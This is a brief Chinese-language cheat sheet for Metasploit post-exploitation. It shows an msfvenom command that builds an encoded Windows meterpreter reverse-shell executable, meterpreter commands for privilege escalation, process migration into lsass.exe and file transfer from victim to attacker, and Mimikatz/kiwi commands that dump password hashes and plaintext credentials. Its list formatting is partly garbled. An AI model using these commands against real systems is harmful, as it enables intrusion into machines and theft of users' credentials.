產 Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={PORT} -f exe -e x86/shikata_ga_nai > {FILE}

執行

  • 記得 Payload 需要修改成相對應的windows/meterpreter/reverse_tcp

常見指令

  • ls,pwd , mkdir, catBJ4getuid-
  • 取得使用者名稱edit {檔名}- 會直接開啟 vim 可以改檔案sysinfo- 系統資訊getsystem- 如果有過 UAC 的話,有機率可以直接拿 system
  • 執行後輸入 getuid 就可以確認自己是否真的是 system 了ps``migrate {PID}- 可以讓自己爬到 x64 之類的 system 權限上
  • 例如 lsass.exe 的 PIDscreenshot- 截圖
  • 需要是當前使用者,不能是 system 之類upload {檔案} / download {檔案}- upload -> attacker to victim
  • download -> victim to attacker

Mimikatz

  • 需要是 system 權限
  • load kiwi
  • help kiwi
  • lsa_dump_sam取 Hashlsa_dump_secrets- 取明文密碼kiwi_cmd sekurlsa::logonpasswords- 需要先 migrate 到 x64 上